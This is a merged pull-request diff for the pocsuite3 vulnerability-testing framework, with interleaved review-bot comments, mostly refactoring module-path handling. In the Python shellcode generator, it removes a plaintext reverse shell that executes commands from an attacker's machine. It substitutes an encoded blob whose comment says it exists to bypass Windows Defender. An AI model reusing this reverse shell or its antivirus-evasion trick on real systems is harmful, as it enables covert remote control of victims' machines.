Merge pull request #206 from 13ph03nix/master
New feature and fix compatibility problem
13ph03nix authored Aug 17, 2021
2 parents 1686ece + 0d8e05f commit eaa996a
Showing 9 changed files with 51 additions and 53 deletions.
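--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -231,4 +231,11 @@ Cross-platform shell code generation
 # version 1.7.7
 -----------------
 * 添加--dork自动用poc中的dork字段扫描功能
-* 适配Debian源格式需求
+* 适配Debian源格式需求
+
+# version 1.7.8
+-----------------
+* add option to display extra parameters of poc
+* add more poc attribute to result dict
+* allow custom module path in console mode
+* fix some compatibility problems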
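--- a/docs/CODING.md
+++ b/docs/CODING.md
@@ -646,7 +646,7 @@ from pocsuite3.api import get_results
 def run_pocsuite():
 # config 配置可参见命令行参数, 用于初始化 pocsuite3.lib.core.data.conf
 config = {
-'url': ['http://127.0.0.1:8080', 'http://127.0.0.1:21']
+'url': ['http://127.0.0.1:8080', 'http://127.0.0.1:21'],
 'poc': ['ecshop_rce', 'ftp_burst']
 }
 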
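--- a/manpages/poc-console.1
+++ b/manpages/poc-console.1
@@ -31,7 +31,7 @@ is maintained at:
 .I https://github.com/knownsec/pocsuite3/blob/master/docs/USAGE.md
 .PP
 .SH VERSION
-This manual page documents pocsuite version 1.7.7
+This manual page documents pocsuite version 1.7.8
 .SH AUTHOR
 .br
 (c) 2014-2021 by Knownsec 404 Team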
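--- a/manpages/pocsuite.1
+++ b/manpages/pocsuite.1
@@ -250,7 +250,7 @@ is maintained at:
 .I https://github.com/knownsec/pocsuite3/blob/master/docs/USAGE.md
 .PP
 .SH VERSION
-This manual page documents pocsuite version 1.7.7
+This manual page documents pocsuite version 1.7.8
 .SH AUTHOR
 .br
 (c) 2014-2021 by Knownsec 404 Team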
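--- a/pocsuite3/__init__.py
+++ b/pocsuite3/__init__.py
@@ -1,5 +1,5 @@
 __title__ = 'pocsuite'
-__version__ = '1.7.7'
+__version__ = '1.7.8'
 __author__ = 'Knownsec Security Team'
 __author_email__ = '[email protected]'
 __license__ = 'GPL 2.0'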
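--- a/pocsuite3/lib/core/common.py
+++ b/pocsuite3/lib/core/common.py
@@ -797,16 +797,15 @@ def ltrim(text, char):
 return text
 
 
-def index_modules() -> list:
+def index_modules(modules_directory):
 """ Returns list of all exploits modules
 :param str modules_directory: path to modules directory
 :return list: list of found modules
 """
 
 modules = []
-for root, dirs, files in os.walk(paths.POCSUITE_POCS_PATH):
-_, package, root = root.rpartition("pocsuite3/pocs/".replace("/", os.sep))
+for root, _, files in os.walk(modules_directory):
 files = filter(lambda x: not x.startswith("__") and x.endswith(".py"), files)
 modules.extend(map(lambda x: os.sep.join((root, os.path.splitext(x)[0])), files))
 
@@ -822,7 +821,7 @@ def humanize_path(path: str) -> str:
 :return str: humanized path
 """
 
-return path.replace(".", "/")
+return path.replace(".", os.sep)
 
 
 def pythonize_path(path: str) -> str:
@@ -834,7 +833,7 @@ def pythonize_path(path: str) -> str:
 :return str: pythonized path
 """
 
-return path.replace("/", ".")
+return path.replace(os.sep, ".")
 
 
 def module_required(fn):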
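Review bot: `pythonize_path` (L110) now switches on `os.sep`, so on Windows a module path written with forward slashes — which the previous `replace("/", ".")` converted and which Windows path APIs accept — is left unconverted, while on POSIX nothing changes; `return path.replace("/", ".").replace(os.sep, ".")` keeps both forms working, the second call being a no-op where `os.sep` is `/`. In the first hunk `index_modules` also lost its no-argument form and its `-> list` annotation; unless every caller is known to be updated, `def index_modules(modules_directory=paths.POCSUITE_POCS_PATH) -> list:` keeps existing call sites working, and `paths` is the name the removed line already used. Note too that `os.walk` on a directory that does not exist yields nothing, so a mistyped custom directory silently produces an empty module list instead of an error — an `os.path.isdir` check with a logged warning would make that visible. The body of `index_modules` continues past the end of its hunk.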
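--- a/pocsuite3/lib/core/interpreter.py
+++ b/pocsuite3/lib/core/interpreter.py
@@ -171,7 +171,7 @@ class PocsuiteInterpreter(BaseInterpreter):
 attack Attack target and return target vulnerable infomation
 exploit Get a shell from remote target"""
 
-def __init__(self):
+def __init__(self, module_directory=paths.POCSUITE_POCS_PATH):
 super(PocsuiteInterpreter, self).__init__()
 
 self.current_module = None
@@ -186,7 +186,9 @@ def __init__(self):
 self.module_commands.extend(self.global_commands)
 self.module_commands.sort()
 
-self.modules = index_modules()
+self.modules = index_modules(module_directory)
+self.module_parent_directory = os.sep.join(
+module_directory.rstrip(os.sep).split(os.sep)[0:-1]) + os.sep
 self.modules_count = len(self.modules)
 # init
 conf.console_mode = True
@@ -198,10 +200,8 @@ def __init__(self):
 self.main_modules_dirs = []
 for module in self.modules:
 temp_module = module
-if IS_WIN:
-temp_module = temp_module.replace("/", "\\")
-temp_module = temp_module.replace(paths.POCSUITE_ROOT_PATH, "").lstrip("\\")
-temp_module = temp_module.replace(paths.POCSUITE_ROOT_PATH, "").lstrip("/")
+temp_module = temp_module.replace(
+self.module_parent_directory, '').lstrip(os.sep)
 self.main_modules_dirs.append(temp_module)
 
 self.__parse_prompt()
@@ -315,16 +315,16 @@ def command_use(self, module_path, *args, **kwargs):
 if not module_path.endswith(".py"):
 module_path = module_path + ".py"
 if not os.path.exists(module_path):
-module_path = os.path.join(paths.POCSUITE_ROOT_PATH, module_path)
+module_path = os.path.join(self.module_parent_directory, module_path)
 if not os.path.exists(module_path):
 errMsg = "No such file: '{0}'".format(module_path)
 logger.error(errMsg)
 return
 try:
 load_file_to_module(module_path)
 self.current_module = kb.current_poc
-self.current_module.pocsuite3_module_path = ltrim(rtrim(module_path, ".py"),
-os.path.join(paths.POCSUITE_ROOT_PATH, ""))
+self.current_module.pocsuite3_module_path = ltrim(
+rtrim(module_path, ".py"), self.module_parent_directory)
 except Exception as err:
 logger.error(str(err))
 
@@ -447,7 +447,7 @@ def command_list(self, *args, **kwargs):
 tb = prettytable.PrettyTable(["Index", "Path", "Name"])
 index = 0
 for tmp_module in self.main_modules_dirs:
-found = os.path.join(paths.POCSUITE_ROOT_PATH, tmp_module + ".py")
+found = os.path.join(self.module_parent_directory, tmp_module + ".py")
 with open(found, encoding='utf-8') as f:
 code = f.read()
 name = get_poc_name(code)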
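Review bot: The parent-directory derivation at L132-L133 breaks for a relative single-component `module_directory` such as `pocs`: `split(os.sep)[0:-1]` is empty, so `module_parent_directory` becomes a bare `os.sep`, after which the `replace` at L145-L146 deletes every separator from each module path and `command_use`/`command_list` (L155, L175) resolve modules against the filesystem root. `self.module_parent_directory = os.path.join(os.path.dirname(os.path.normpath(module_directory)), '')` yields `''` in that case (modules then resolve relative to the current directory) and `normpath` also copes with mixed separators on Windows. Stripping the prefix with `str.replace` is unanchored — it rewrites any later occurrence of the same substring — so a prefix check such as `if temp_module.startswith(self.module_parent_directory): temp_module = temp_module[len(self.module_parent_directory):]` is the safer form. `__init__` starts before the first hunk and continues between and after the ones shown.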
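--- a/pocsuite3/shellcodes/python.py
+++ b/pocsuite3/shellcodes/python.py
@@ -1,3 +1,5 @@
+import zlib
+import base64
 from .base import ShellCode
 
 
@@ -7,7 +9,8 @@ class PythonShellCode(ShellCode):
 """
 
 def __init__(self, connect_back_ip='localhost', connect_back_port=5555):
-ShellCode.__init__(self, connect_back_ip=connect_back_ip, connect_back_port=connect_back_port)
+ShellCode.__init__(self, connect_back_ip=connect_back_ip,
+connect_back_port=connect_back_port)
 
 def get_python_code(self, bad_chars):
 """
@@ -18,34 +21,23 @@ def get_python_code(self, bad_chars):
 print("Settings for connect back listener must be defined")
 return False
 
-python_code = """
-#!/usr/bin/python
-import socket,subprocess
-HOST = '{{LOCALHOST}}' # The remote host
-PORT = {{LOCALPORT}} # The same port as used by the server
-s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-# connect to attacker machine
-s.connect((HOST, PORT))
-# send we are connected
-s.send('[*] Connection Established!')
-# start loop
-while 1:
-# recieve shell command
-data = s.recv(1024)
-print data
-# if its quit, then break out and close socket
-if data == 'quit' or data == 'q':
-break
-# do shell command
-proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
-# read output
-stdout_value = proc.stdout.read() + proc.stderr.read()
-# send output to attacker
-s.send(stdout_value)
-# close socket
-s.close()
-"""
-
+# compress and base64 encode to bypass windows defender
+python_code = (
+b'eJxtUsFu2zAMvfsrWORgezOctdhpQA5BkGHFuiZofBuGQLY4'
+b'WKgteZKcoijy7yUlNzOK6mLz8fHpkeLiajk6u6yVXg7PvjU6'
+b'Uf1grAdnmkf0hRvrwZoGnUt+7A4VrCB9ebnbbdZ3HJ7PKdBZ'
+b'QNUiWOyNR2iN88l+98DcicrR+Qzwn+tEjxDuEQ5GhxLqZ/Cc'
+b'QHtCmzgqjg7K+MmmaP39eHu/rYq37GG3+Xk8VA/b9a88WUBj'
+b'tMbGgzcgvBdEsdCLplUaE1dO2Sxj7wWwrZyrHGoJTwjC4psC'
+b'SuIznqW/P/2BTUSV0bB1XtSdci3KqzRUe0F9dMYMyVOrOoTr'
+b'b0ns1GKj8ERNtdh1pNz3QsuQk8ILbrEkyim7/nLzNQ/4YJX2'
+b'ITtJqL+gvIN/o/IFD0hDbVE8ghlpdOS66YzDaRihhAqiOL0U'
+b'V6Vg7AxJozc+QWi6RpoPTPLDs8nLCpR7M6DOWK2I/FVlR6R/'
+b'L8nQas683W8DjtZ+iCv9Hs4vUxOS+xvG2FEUP55ENyLZ4ZIy'
+b'YiVTsxw+X0C6bQInsfC0UWy+FFE4PvBcP+zQfKS0NByS3itr'
+b'QQTj'
+)
+python_code = zlib.decompress(base64.b64decode(python_code)).decode()
 python_code = self.format_shellcode(python_code)
 return python_code
 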
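Review bot: The template that `get_python_code` returns now exists in the tree only as an opaque zlib+base64 blob (L231-L245) with no readable counterpart, so reviewers and downstream packagers can no longer audit what this method emits, and nothing checks that the decoded text still carries the `{{LOCALHOST}}`/`{{LOCALPORT}}` placeholders the removed template used and that `format_shellcode` presumably fills in. Keep the plaintext template under version control (for instance as a data file) and derive or verify the blob from it in a test, or at minimum add `assert '{{LOCALHOST}}' in python_code and '{{LOCALPORT}}' in python_code` after the decode at L246, so a corrupted or swapped constant fails loudly instead of yielding text nobody has read. The decode at L246 also lets `zlib.error` and `binascii.Error` propagate without context; a comment naming the source of the constant, or wrapping the failure in an error that says the embedded template is invalid, would help whoever hits it. The method's signature is in the preceding hunk, so this hunk starts inside its body.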
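--- a/setup.py
+++ b/setup.py
@@ -7,14 +7,14 @@
 
 def find_packages(where='.'):
 # os.walk -> list[(dirname, list[subdirs], list[files])]
-return [folder.replace("/", ".").lstrip(".")
-for (folder, _, fils) in os.walk(where)
-if "__init__.py" in fils]
+return [folder.replace(os.sep, ".").strip(".")
+for (folder, _, files) in os.walk(where)
+if "__init__.py" in files]
 
 
 setup(
 name='pocsuite3',
-version='1.7.7',
+version='1.7.8',
 url='http://pocsuite.org',
 description='Pocsuite is an open-sourced remote vulnerability testing framework developed by the Knownsec Security Team.',
 long_description="""\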
